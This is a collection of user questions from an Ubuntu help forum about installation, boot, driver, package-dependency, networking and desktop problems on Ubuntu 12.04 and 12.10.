246870	broken dependencies 12.04	when i try to update or install new packages it pops up an eror message telling me that the package catalog needs repaired , i click repair and than it tells me it was unable to repair . the following packages have unmet dependencies : initramfs-tools : depends : initramfs-tools-bin ( > = 0.99ubuntu13 ) but 0.99ubuntu13.1 is installed depends : klibc-utils ( > = 1.5.9-1 ) but 1.5.25-1ubuntu2 is installed depends : busybox-initramfs ( > = 1:1.13.3-1ubuntu5 ) but 1:1.18.5-1ubuntu4.1 is installed depends : udev ( > = 147~-5 ) but 175-0ubuntu9.2 is installed depends : findutils ( > = 4.2.24 ) but 4.4.2-4ubuntu1 is installed depends : util-linux ( > 2.15~rc1 ) but 2.20.1-1ubuntu3 is installed and when performed 'sudo apt-get -f install ' the output reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : initramfs-tools the following packages will be upgraded : initramfs-tools 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 3 not fully installed or removed . need to get 0 b/49.0 kb of archives . after this operation , 1,024 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of initramfs-tools : initramfs-tools depends on initramfs-tools-bin ( < < 0.99ubuntu13.1~ ) ; however : version of initramfs-tools-bin on system is 0.99ubuntu13.1 . dpkg : error processing initramfs-tools ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of plymouth : plymouth depends on initramfs-tools ; however : package initramfs-tools is not configured yet . dpkg : error processing plymouth ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of plymouth-label : plymouth-label depends on plymouth ( = 0.8.2-2ubuntu31 ) ; however : package plymouth is not configured yet . dpkg : error processing plymouth-label ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : initramfs-tools plymouth plymouth-label e : sub-process /usr/bin/dpkg returned an error code ( 1 ) and i tried [ enter link description here ] [ 1 ] [ 1 ] : https : //help.ubuntu.com/community/aptget/howto # maintenance_commands and not work how can fix this error ?
246872	installed a fresh copy of 12.10 and now all i have is my desktop picture	i did fresh install of ubuntu 12.10 everything was fine but now i donât have anything but a desktop picture . i can get into my terminal and launch firefox that way but cant do much more i forced a reboot a few times but nothing pops up just my pretty water picture anybody got a idea how to bring up my side menu and time and logout menu .
246874	unable to boot to live usb linux	i am trying to test different distros from a specific usb thumb drive that i have . i am installing them using unetbootin . the installation goes fine . i am doing this process from xubuntu 12.10 live usb ( and sometimes linux mint 13 mate ) . however when i try to boot from it , i get to the unetbootin bootloader and after i choose an option , most of them seem to just hang there . farthest i got was with mageia which kernel paniced about 2 seconds into the boot sequence . the distros i used were ubuntu 12.10 mageia dual arch cd , latest release linux mint 14 mate linux mint 14 cinnamon linux mint lmde mate + cinnamon is this because of a flash drive hardware issue ? is there something i can do to test ? all i have tried is fsck and `` file system check '' from disk utility both of which return `` clean '' ? or is it possible that all isos got corrupted upon download ? edit : looks to be a flash drive issue , looks like a section of my flash drive is fubar.. i got the below wierd benchmark from `` disk utility '' , repeated thrice ...
246880	using canon lide 700f with xane over usb	i know , i know , i should have never gotten a canon to connect to a linux box ... but the sane supported-scanners doc said that the canoscan 700f is supported `` good '' . i took that to mean that it can scan at all but the highest res setting ( 9600 dpi ) . but i have n't been able to actually scan anything except a low res preview . i can see in /var/log/kern.log that the kernel sees it : jan 23 20:30:22 morpheus kernel : [ 269901.872029 ] usb 1-2 : new high-speed usb device number 14 using ehci_hcd jan 23 20:30:22 morpheus kernel : [ 269902.005556 ] usb 1-2 : new usb device found , idvendor=04a9 , idproduct=1907 jan 23 20:30:22 morpheus kernel : [ 269902.005564 ] usb 1-2 : new usb device strings : mfr=1 , product=2 , serialnumber=0 jan 23 20:30:22 morpheus kernel : [ 269902.005569 ] usb 1-2 : product : canoscan jan 23 20:30:22 morpheus kernel : [ 269902.005573 ] usb 1-2 : manufacturer : canon this usually works : $ sudo sane-find-scanner [ sudo ] password for xxx : # sane-find-scanner will now attempt to detect your scanner . if the # result is different from what you expected , first make sure your # scanner is powered up and properly connected to your computer . # no scsi scanners found . if you expected something different , make sure that # you have loaded a kernel scsi driver for your scsi adapter . could not fetch string descriptor : operation timed out could not fetch string descriptor : operation timed out found usb scanner ( vendor=0x04a9 , product=0x1907 ) at libusb:001:014 this works only sometimes : $ sudo scanimage -lv no scanners were identified . if you were expecting something different , ... and when xsane does find the scanner and i try to scan something , it clicks a little , then just hangs . does anyone have experience getting this device to work on some version of linux or should i just send it back and get an hp scanner ?
246886	how do i open the application launcher on kde with just the meta ( `` windows '' ) key ?	how do i open the application launcher ( `` start menu '' ) of kubuntu with my windows key ? similar to how the start menu in windows is opened . i do n't want to use alt+f1 .
246887	how can i install ubuntu from the iso in windows ?	i do n't have a usb stick or discs available to boot from , so is there anyway i can use the iso image to install from within windows ? i tried using the windows installer but the download keeps failing and takes ~5 hours.. so i downloaded the iso via torrent in about 1 hour .
246888	why does ~/.local/share/trash still use lots of space even after emptying the trash ?	i delete files via nautilus . i then empty the trash . it shows as empty . however , ~/.local/share/trash contains 1.5g of stuff . i have a small ssd and so this is highly annoying . here 's what ~/.local/share/trash shows now . mfisch @ caprica : ~/.local/share/trash $ du -h . 4.0k ./expunged 988m ./files/binary-precise-armhf-tar-20130123-6.tar/casper 8.0k ./files/binary-precise-armhf-tar-20130123-6.tar/.disk 12k ./files/binary-precise-armhf-tar-20130123-6.tar/install 988m ./files/binary-precise-armhf-tar-20130123-6.tar 1.5g ./files 24k ./info 1.5g . why are n't these files removed ? will they be purged later , perhaps by cron ? edits : i 'm already using a fully updated 12.10 image these files were in ~/downloads , on my ssd drive , they were not on another device . the permissions look fine . and this morning i have 4 more files in here that never got expunged when i emptied the trash : ls -rl ~/.local/share/trash total 12 drwx -- -- -- 2 mfisch mfisch 4096 jan 23 20:15 info drwx -- -- -- 3 mfisch mfisch 4096 jan 23 20:15 files drwx -- -- -- 2 mfisch mfisch 4096 jan 22 14:01 expunged ls -rl ~/.local/share/trash/files/ -rw-rw-r -- 1 mfisch mfisch 313935076 jan 23 12:33 maguro.img -rw-rw-r -- 1 mfisch mfisch 4679680 jan 23 12:30 maguro-boot.img -rw-rw-r -- 1 mfisch mfisch 179398453 jan 23 12:35 grouper.img.gz -rw-rw-r -- 1 mfisch mfisch 5244928 jan 23 12:33 grouper-boot.img drwxr-xr-x 5 mfisch mfisch 4096 jan 23 16:05 binary-precise-armhf-tar-20130123-6.tar so here 's an update . i rm -rf 'd .local/share/trash last week . it did n't come back until i rebooted a couple days later . since then , it 's been well behaved . so i think this means that this is a bug rather than a useful question . i 'll file a bug if it happens again because i should be able to trust that trash is doing what it is supposed to do . here 's what it looks like now : mfisch @ caprica : ~/.local/share/trash $ du . 4 ./expunged 4 ./files 4 ./info 16 .
246897	how to change boot logo on a live usb stick ?	i 'm making a little live usb with my own distro , nicknamed `` hackbuntu '' - it is basically a little bootable usb drive that you plug into a computer , boot it up , and then feel like a ninja when you 're off visiting onionland and decrypting truecrypt volumes . i can pretty much hanlde setting it up the way i like , but i want to change the default boot logo , the white `` ubuntu '' on a purple background , to a light green `` hackbuntu '' on a dark , dark green background . ( the way that lubuntu displays `` lubuntu '' on a sky blue background during boot-up . ) i ca n't figure out how to do this , however . i 've found a few goodies in /syslinux , but i ca n't manage to get it customized all the way . i need someone to explain all that i need to do , because it appears that quite a bit of the `` image '' is actually rendered from info provided in configuration files . ( e.g. , /syslinux/bootlogo is making me nuts trying to figure out what to do with it ... it 's a cpio archive with some sort of binary file called init inside of it ... ) i 've read this , but it does n't give much info on how to customize live media ... my usb drive is only 4 gig , so installing a normal install on the usb stick is out of the picture ... i 've already seen this question , which does not explain how to customize live media . ( live media , such as a live usb drive , lacks the /lib/plymouth directory entirely , making all answers from the aforementioned question invalid . )
246899	how to automount hpfs/ntfs ( exfat ) 64gb microsd card on 10.04 ?	when trying to mount my 64gb microsd card , it fails . did a bit of research and found i needed exfat . sudo apt-add-repository ppa : relan/exfat sudo apt-get update sudo apt-get install fuse-exfat i can now mount the filesystem manually & everything works fine . what am i now supposed to do to enable the automount ? any insights or guidance as to what i can do would be much appreciated .
246900	ubuntu keeps crashing/freezing , please help !	been at it for 4 hours trying to get it to work , i looked at numerous complaints about crashes in hopes of solution but nothing worked . at the login screen , the only thing i can move for the first 10 seconds is the mouse , everything else is frozen and i ca n't click on any of it . after 10 seconds everything including the mouse freezes and a black screen with text shows up that says gpu lockup - switching to software fbcon after that it continuously says failed to idle channel 1 pfifo - playlist update failed failed to idle channel 2 over and over again , 5 seconds on the black screen it blinks into the sign in screen for 4 seconds , the goes back and throws the messages above at me . i have tried installing priority drivers i have tried numerous things with coding , nothing has worked more information : i have gtx 580 installed , 8 gb of ram , 64 bit version . i got ubuntu started but i was never able to enter through the login . so i have to use the cd install and set nomodeset or acpi=off . i have tried numerous things with the terminal , trying to install the graphics drivers manually . everything i do seems to reset when i reboot , as if it never happend . so all in all , proprietary drivers never take effect because they reset on reboot no matter what i try to do .
246902	printer configured on lan does not print when system connects through wifi	i am using 12.04 64 bit . i have noticed if i configure ( connect ) any printer when my machine is connected to lan ( eth port ) then it takes print job only if i am connected to lan . if i try any printing job on wifi , it gets stuck in the print queue . similarly , when on wifi if i configure the same printer again then it will take print action on wifi , but again if i switch to lan then it will again not print . so for 1 printer i have to configure two times , one on lan and other on wifi . also i have to make sure while firing print jobs that i should be selecting right printer by checking the way i am connected to network . in an ideal situation , any printer configured to machine should take print action on lan as well as on wifi which happens exactly on windows . i believe there is something i am doing wrong so please any one correct me ... .
246904	is there a `` bartender '' -like app for ubuntu ?	there is an app for osx called `` bartender '' that lets you hide multiple app indicators behind a single icon . i 've tried looking for an ubuntu/*nix equivalent to no avail . does any one have any suggestions ?
246907	how to make a readable fat16/fat32 partition on usb stick for windows access ?	i want to create a windows accessible partition ( fat16/fat32 ) . but even the created partition can read under linux . it can not see on windows . just display a driver symbol like e : . i 'm using parted to create the partition . and then use mkdosfs -a -f32 -v /dev/sdc2 disk /dev/sdc : 2022mb sector size ( logical/physical ) : 512b/512b partition table : msdos disk flags : number start end size type file system flags 1 4096b 22.0mb 22.0mb primary ext3 2 22.0mb 56.6mb 34.6mb primary fat32 lba
246910	how to disable usb enhanced host controller ?	i want to delete or disable 'usb enhanced host controller ' driver because it makes my usb not recognized . how to disable it ?
246913	'insufficient permissions ' error on `adb push` command on 12.04	when i tried to push my apk file into a tablet , i got this error , please help me out . adb server is out of date . killing ... * daemon started successfully * error : insufficient permissions for device . thanks in advance for the help .
246914	how to view similar commands in terminal ?	os version : ubuntu 12.04 i wrote veditor in my terminal and got the following message : no command 'veditor ' found , but there are 39 similar ones my question is how can i view those 39 similar commands ?
246915	any other software for installing .exe files in ubuntu except wine	i 've tried wine software to install .exe files in my ubuntu 12.10 os but many times it is not able to install the software appropriately or if installed then the windows software file does not works properly . so can anyone suggest me some other software in ubuntu which will helps me to install and run windows software in my ubuntu 12.10 . thanks in advance
246916	gnome-system-monitor has no gtk window decoration	really simple problem that i ca n't seem to figure out . the window decorator works for everything else , but whenever i open the system monitor , it opens in full screen with no border . i 'm using gnome classic as my de if that matters at all . anyone know a fix or workaround to this ? edit : seems to only happen when it 's not started as root .
246920	can not use super+space as a shortcut in xfce	i moved from kde to xfce , and i 've found that i can not use super+space as a keyboard shortcut ( applied via the xfce keyboard settings program ) . my main concern is that i use that shortcut to open up my drop-down terminal ( which is currently xfce4-terminal using the -- drop-down option ) . the catch so far has been that i can use yakuake with this keyboard shortcut , but not xfce4-terminal .
246921	is my command to clone a drive optimal ?	i have done half an hour reading around to prepare to clone my hard drive . it has multiple partitions , including a windows partition . i am going to buy a very large external hard drive for the backup . i would like to be able to use this clone to restore the whole drive in case something goes wrong ( i 'm about to do some os re-shuffling ) . i want do learn how to do this using dd , as i like low-level tools that do n't require installing anything . i found the following useful code from the ubuntu forums ( entered from a root shell using a live cd ) : dd if=/dev/hda of=/dev/hdb & pid= $ ! while kill -usr1 $ pid ; do sleep 1 ; done ( i know that i will have to edit the input and output locations . ) however i have two questions . the first one is very noobie : this command is split across two lines . surely when i press enter after the exclamation mark it will start the process ? two , on other sites it recommended entering block size . like this : # dd if=/dev/hda conv=sync , noerror bs=64k of=/mnt/sda1/hda.img i do n't know anything about block sizes . is 64k right ? it looks like my block size is 512 bytes from the following , the output of sudo fdisk -ul : disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xc3ffc3ff device boot start end blocks id system /dev/sda1 * 63 143364059 71681998+ 7 hpfs/ntfs/exfat partition 1 does not start on physical sector boundary . /dev/sda2 976867328 1465147391 244140032 7 hpfs/ntfs/exfat /dev/sda3 143364094 976867327 416751617 5 extended partition 3 does not start on physical sector boundary . /dev/sda5 143364096 162895871 9765888 82 linux swap / solaris /dev/sda6 162897920 205864959 21483520 83 linux /dev/sda7 205867008 976867327 385500160 83 linux partition table entries are not in disk order disk /dev/mapper/cryptswap1 : 10.0 gb , 10000269312 bytes 255 heads , 63 sectors/track , 1215 cylinders , total 19531776 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x433bb3a7 disk /dev/mapper/cryptswap1 does n't contain a valid partition table thank you .
246924	ubuntu 12.04 64-bit will not connect to wired network	this is a brand new 64-bit pc , built around a gigabyte z777-d3h motherboard and an i7 processor . it has 2x1tb sata drives , one loaded with windows 8 and the other with ubuntu 12.04 . the wired network connection into my belkin f1p1241enau modem works with no problem at all , and a test install of ubuntu 12.04 into a virtual box client also connects with no problem , but the installation on the dedicated 1tb hdd will not connect . the messages i get are `` network disconnected - you are now offline '' and `` no network devices available '' i also tried connecting via a wireless usb dongle ( which i know works fine ) with no better results . my old dell 32-bit computer runs ubuntu 10.04 and has no trouble connecting with the same cable and dsl modem . any help at all will be greatly appreciated .
246930	ubuntu server : ssh is showing in process but does not work	this is all within a lan . my server can be pinged . i can run php apps on my server from within the lan . i have installed openssh-server . i tried the command ps aux and it shows the process listed as /usr/sbin/sshd -d however , when i try the command netstat -tulpn the pid/program name column is blank ( i mean it has a hyphen ) . honestly , i do n't understand this area too well . but the strange thing is that ssh used to work but it suddenly stopped . i 'd really love to have some help on resolving this . thanks ! edit : i just realised ... i can not even run php apps via a browser . but localhost in the uri works with the default index.html page . more info : just for the record , i never did any iptables settings . only after i got stuck with this problem that i did iptables -f. i 've even tried reinstalling ssh a couple of times but i do get the feeling that the entries in iptables are causing this problem as i learnt from the comments of below . if i turn off the firewall with ufw disable , ssh localhost works . now when i try accessing this server from another pc , i get a pretty big error message like this : @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ warning : remote host identification has changed ! @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ it is possible that someone is doing something nasty ! someone could be eavesdropping on you right now ( man-in-the-middle attack ) ! it is also possible that a host key has just been changed . the fingerprint for the ecdsa key sent by the remote host is d4 : ... ... ..4 : e9:75:06:61 . please contact your system administrator . add correct host key in /home/khalid/.ssh/known_hosts to get rid of this message . offending ecdsa key in /home/khalid/.ssh/known_hosts:1 remove with : ssh-keygen -f `` /home/khalid/.ssh/known_hosts '' -r 192.168.1.6 ecdsa host key for 192.168.x.x has changed and you have requested strict checking . host key verification failed . and there 's no conection .
246931	uefi boot loading problems ... ca n't load windows 8 or ubuntu !	i got a new dell xps 8500 with windows 8 . i understand that it has uefi ( as opposed to traditional boot-loading bios system ) . i installed ubuntu 12.04 ( not realizing that it does n't work as well with the secure-load/uefi system ) . i partitioned my solid state drive so windows was on one partition , and ubuntu would be on a new one ( sdb7 ) . this always worked with my previous computer ... i had windows xp on one partition and ubuntustudio on a separate partition . grub always gave me a boot menu . here comes the problem : at first my computer would n't let me boot from the usb and with uefi i ca n't get into the boot menu ... with uefi i have to access boot options via windows . i had to un-select `` secure '' booting , which allowed the computer to boot from my ubuntu usb . i successfully installed ubuntu , but when i restarted the computer it booted right into the usb again . i expected it to give me a boot menu ( including windows 8 , ubuntu , and the usb stick ) . so i shut down the computer , removed the usb stick and restarted it ... and i got the following error message on a black screen : '' reboot and select proper boot drive or insert boot media in selected boot device and press a key . '' now this should n't be a huge problem ... i should just `` select the proper boot drive '' ... but i ca n't access bios or a boot menu unless i 'm inside windows ! ! and i ca n't get into windows ! what i can do ( all i can do ) is run ubuntu live from my usb . i 've looked at lots of forums and i 've tried several things , but nothing works ! this is kind of a new issue so maybe nobody has had this problem yet . others had the same error message , but from different problems . they can usually only log into windows . i ca n't get into windows . when i boot ubuntu live from the usb i can look into the files for my windows and ubuntu installations , but i ca n't boot into either one . here 's what i tried ( which did n't work so far ) : -re-installing ubuntu 12.10 -boot-repair program in linux here 's another piece of information . when i tried boot-repair , it told me that `` the boot of your pc is in legacy mode ... you may want to retry after changing it to efi mode . '' i do n't know how to change it to efi mode . also ... boot-repair tells me to : `` remember to tell the bios to boot on sdb1/efi/ubuntu/grubfix64.efi '' i do n't even know what that means . if you 're interested ... i tried the boot-repair three times and got these urls : http : //paste.ubuntu.com/1565228 http : //paste.ubuntu.com/1565261 http : //paste.ubuntu.com/1565303 anyone with any info please help me out . my brand-new computer is unbootable ...
246937	slow boot due to some io wait	i would like to improve boot time of my system now it takes almost minute . the system boots from ssd . according to bootchart the system waits for something for at least 30 seconds and does almost nothing . the bootchart picure is below . i have two questions : what causes this pause an how can i improve boot time ? is there a better place place to ask such questions ? ubuntu wiki https : //wiki.ubuntu.com/bootcharting encourages posting bootchart data but i see no way to get feedback on it there and askubuntu have several similar questions mostly unanswered : why is my system slow to boot ? how can i improve my boot time ? ( bootchart and dmesg output included )
246947	how to setup a vpn server from a home network with an ubuntu server	so here is what i want to do : set an ubuntu desktop box as a media center for my tv . use the same box as a local network storage . need to have vpn access to the same box from other outside computers . the media center part is simple enough . the rest is where i 'm having trouble . here is the local network setup i have in place : i get dsl internet from a speedtouch modem ( fixed ip ) with dhcp setup . internet goes via cable to a cisco e1000 wireless router set as a regular switch . further on there is a cable connection from the e1000 to my windows 7 desktop . then there is the ubuntu desktop box using a 300 mb wireless connection . there is also a wd media player using the wireless connection . an hp printer uses the wireless wireless connection . multiple android phones and an ipad may be connected also . as said before , internet is routed by the modem , using dynamic ip allocation . the most important thing is being able to access the ubuntu server via a vpn so i could access my work from outside computers . and , of course , still being able for the rest of the stuff ( media player , printer , phones , tablets , etc . ) to access the network and internet . can anyone give feedback about how to set up the vpn to achieve these goals ?
246949	how to relay gmail using postfix ?	i want to test php mail function from my ubuntu desktop . i heard that postfix can do this . but i do n't know how to configure postfix to to send email via gmail account .
246952	how to edit files directly on server with gvim when ssh is mounted from dolphin ?	i would like to use gvim to edit external files that are accessed through dolphin . i have an external server with files to be modified i access the server using ssh using dolphin 's built-in module i right click on a file and edit it with gvim gvim open a copy of the file stored in /var/tmp/kdecache- < user > /krun/4553434_0_. < filename > if i modify the file i have to close gvim to have a dialog box asking me to send the file to the server . so , i 'm not able to make multiple changes without closing/re-opening my files and this is not possible for work . is there a solution to simple edit my files on servers using ssh or ftp with gvim ?
246955	why use env in shebang ?	what is the purpose of using # ! /usr/bin/env < sh|bash|python > shebang compared to # ! /bin/bash , # ! /bin/sh or # ! /usr/bin/python ?
246956	partitions unlocked from unity launcher show up again after starting gparted	i 'm on ubuntu 12.10 and dual boot . i have put the windows partitions to the launcher blacklist so that they wo n't show up there ( via `` unlock from launcher '' option ) . these partitions will then appear in the blacklist viewable in dconf-editor . but when i start gparted all blacklisted partitions reappear in the launcher ( and get lost in the blacklist as well ) . is this intended or a bug ( i would guess it 's a gparted bug , as i do n't get the result when i start gnome-disks ) ? does anyone know how to solve this ?
246962	unable to connect usb modem	i want to configure my dlink usb modem to ubuntu 12.10 , it does not detect it .
246966	problem installing grub customizer in lubuntu	i 'm using lubuntu . i tried to install grub customizer but i have problems . i used the following commands : sudo add-apt-repository ppa : danielrichter2007/grub-customizer sudo apt-get update sudo apt-get install grub-customizer but , i can not find applications > system tools > grub customizer . i also ran gksu grub-customizer in a terminal but nothing happened . what to do ?
246967	unable to download videos using idm on ubuntu	i have installed wine and i have installed idm on it . however , i do not get the link which asks me whether i want to download the video on the page which i get while using windows . as a result , i am not able to download any video at all , especially the ones on youtube . hope you can help me out with this . thank you .
246970	apt-get broken : no module named debian.deb822	sys.path : [ '/usr/lib/update-notifier ' , '/usr/local/lib/python26.zip ' , '/usr/local/lib/python2.6 ' , '/usr/local/lib/python2.6/plat-linux3 ' , '/usr/local/lib/python2.6/lib-tk ' , '/usr/local/lib/python2.6/lib-old ' , '/usr/local/lib/python2.6/lib-dynload ' , '/usr/local/lib/python2.6/site-packages ' ] terry @ terrylaptop : /usr/lib $ sudo apt-get install python-debian reading package lists ... done building dependency tree reading state information ... done python-debian is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 239 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up update-notifier-common ( 0.119ubuntu8.6 ) ... traceback ( most recent call last ) : file `` /usr/lib/update-notifier/package-data-downloader '' , line 26 , in < module > import debian.deb822 importerror : no module named debian.deb822 dpkg : error processing update-notifier-common ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of flashplugin-installer : flashplugin-installer depends on update-notifier-common ( > = 0.119ubuntu2 ) ; however : package update-notifier-common is not configured yet . dpkg : error processing flashplugin-installer ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : update-notifier-common flashplugin-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 ) this problem occurs everytime when i try to use apt-get install to update my ubuntu . i am on 12.04.01 lts . i also installed python-debian from this link : http : //pkgs.org/ubuntu-12.04/ubuntu-main-i386/python-debian_0.1.21ubuntu1_all.deb.html but it does n't work . can somebody help me ? thank you very much . i googled but seems this should be already fixed in old version . terry @ terrylaptop : /usr/lib $ sudo apt-get install dolphin reading package lists ... done building dependency tree reading state information ... done dolphin is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 239 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up update-notifier-common ( 0.119ubuntu8.6 ) ... [ '/usr/lib/update-notifier ' , '/usr/local/lib/python26.zip ' , '/usr/local/lib/python2.6 ' , '/usr/local/lib/python2.6/plat-linux3 ' , '/usr/local/lib/python2.6/lib-tk ' , '/usr/local/lib/python2.6/lib-old ' , '/usr/local/lib/python2.6/lib-dynload ' , '/usr/local/lib/python2.6/site-packages ' ] traceback ( most recent call last ) : file `` /usr/lib/update-notifier/package-data-downloader '' , line 29 , in < module > import debian.deb822 importerror : no module named debian.deb822 dpkg : error processing update-notifier-common ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of flashplugin-installer : flashplugin-installer depends on update-notifier-common ( > = 0.119ubuntu2 ) ; however : package update-notifier-common is not configured yet . dpkg : error processing flashplugin-installer ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : update-notifier-common flashplugin-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 ) terry @ terrylaptop : /usr/lib $ ls /usr/local/lib/python2.6/debian.deb822.py /usr/local/lib/python2.6/debian.deb822.py terry @ terrylaptop : /usr/lib $ cat /usr/local/lib/python2.6/debian.deb822.py import warnings warnings.warn ( `` please use 'debian.deb822 ' instead '' , deprecationwarning , stacklevel=2 ) from debian.deb822 import * you can see that debian.deb822 in /usr/local/lib/python2.6 , but still can not find it . -- -- -- latest update on 2/20 -- -- -- -- -- -- -- -- terry @ terrylaptop : /usr/local/bin $ ls -l /usr/bin/py* -rwxr-xr-x 1 root root 3752 may 2 2012 /usr/bin/py3_compilefiles -rwxr-xr-x 1 root root 97759 may 2 2012 /usr/bin/pycentral -rwxr-xr-x 1 root root 4124 apr 18 2012 /usr/bin/pyclean -rwxr-xr-x 1 root root 11933 apr 18 2012 /usr/bin/pycompile -rwxr-xr-x 1 root root 3723 may 2 2012 /usr/bin/py_compilefiles lrwxrwxrwx 1 root root 8 apr 27 2012 /usr/bin/pydoc - > pydoc2.7 -rwxr-xr-x 1 root root 79 aug 1 2012 /usr/bin/pydoc2.7 lrwxrwxrwx 1 root root 12 apr 27 2012 /usr/bin/pygettext - > pygettext2.7 -rwxr-xr-x 1 root root 22103 aug 1 2012 /usr/bin/pygettext2.7 -rwxr-xr-x 1 root root 217 mar 9 2012 /usr/bin/pyhtmlizer lrwxrwxrwx 1 root root 24 feb 20 07:24 /usr/bin/python - > /usr/loca/bin/python2.7 lrwxrwxrwx 1 root root 24 jun 14 2012 /usr/bin/python2 - > /usr/local/bin/python2.6 lrwxrwxrwx 1 root root 24 jun 14 2012 /usr/bin/python2.6 - > /usr/local/bin/python2.6 lrwxrwxrwx 1 root root 29 apr 27 2012 /usr/bin/pyversions - > ../share/python/pyversions.py terry @ terrylaptop : /usr/local/bin $ ls -l /usr/local/bin/py* -rwxrwxr-x 1 root root 84 feb 20 07:21 /usr/local/bin/pydoc lrwxrwxrwx 1 root root 24 feb 20 07:31 /usr/local/bin/python - > /usr/local/bin/python2.7 lrwxrwxrwx 1 root root 9 feb 20 07:23 /usr/local/bin/python2 - > python2.7 -rwxr-xr-x 1 root root 4610075 jun 14 2012 /usr/local/bin/python2.6 -rwxr-xr-x 1 root root 1424 jun 14 2012 /usr/local/bin/python2.6-config -rwxr-xr-x 1 root root 4917197 feb 20 07:22 /usr/local/bin/python2.7 -rwxr-xr-x 1 root root 1624 feb 20 07:23 /usr/local/bin/python2.7-config lrwxrwxrwx 1 root root 16 feb 20 07:23 /usr/local/bin/python2-config - > python2.7-config lrwxrwxrwx 1 root root 14 feb 20 07:23 /usr/local/bin/python-config - > python2-config i still can not install . the sys.path is : [ '/usr/lib/update-notifier ' , '/usr/local/lib/python27.zip ' , '/usr/local/lib/python2.7 ' , '/usr/local/lib/python2.7/plat-linux2 ' , '/usr/local/lib/python2.7/lib-tk ' , '/usr/local/lib/python2.7/lib-old ' , '/usr/local/lib/python2.7/lib-dynload ' , '/usr/local/lib/python2.7/site-packages ' ] -- -- -- 2013/2/22 update -- -- -- -- -- -- -- - terry @ terrylaptop : /data $ sudo apt-get install python2.7 reading package lists ... done building dependency tree reading state information ... done python2.7 is already the newest version . the following packages were automatically installed and are no longer required : libnepomukdatamanagement4 libkexiv2-10 libkdegames5a libboost-program-options1.46.1 libkdecorations4 libkwinglutils1 libnepomuksync4 libokularcore1abi1 libssl0.9.8 libattica0.3 liblastfm0 libkwineffects1abi3 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 4 not upgraded . 5 not fully installed or removed . after this operation , 0 b of additional disk space will be used .
246971	how to run x86-32 ( ia-32 ) applications on kubuntu x86-64 ( amd64 ) ?	there are some applications that are only for i386 version but i have amd64 version . can i run them on my system ? i am using kubuntu 12.04.1 lts 64-bit version .
246972	let apport catch crashes system-wide	i want to let apport catching all crashes - system wide - which means also crashes in programs which are located for example inside the home folder of a user and not part of ubuntu packages . is there any configuration option to realize this ? silly example : # include < stdio.h > int main ( ) { printf ( `` % n % n % n '' ) ; return 0 ; } make test & & ./test will create a crash but apport will not intercept it . crashreporter on macos is able to create a crash report for all executable files regardless of where they are located in the system .
246973	ubuntu 12.10 installation drm crtc helper set config error failed to set mode on crtc:10	hi : i got this boot error after installing the 64 bit ubuntu in a hp desktop computer . i 'd appreciate any suggestions . thank you .
246976	what grub modules are necessary to boot from lvm on a dos partition ?	i am trying to make my ubuntu machine boot from a /boot lvm , and it seems that the default core.img does not support lvm , so i am trying to figure out what modules i need to supply to grub-mkimage in order to make it find my /boot . so far no luck -- core_lvm.img either becomes too big ( > 32k ) or does not actually see my lvm vg . example : grub-mkimage -p i386-pc -o /boot/grub/core_lvm.img part_msdos ext2 lvm grub-setup -c core_lvm ' ( hd0 ) ' upon boot this gets me into a rescue prompt where i can only see ( hd0-* ) , not my lvm vg . what other modules do i need for lvm to work ? i 'm continuing to experiment with this , but it would be great if someone has already done this and could tell me why the above is not enough for it to work .
246977	can i change which apps the dash displays for a keyword ?	i am using the web app for gmail which is working fine except that when i hit the dash and type mail all i get is thunderbird . if i type gmail then the web app shows but not on the word mail . my question is whether there 's a way to manually add the gmail web app to appear when i type mail in the dash .
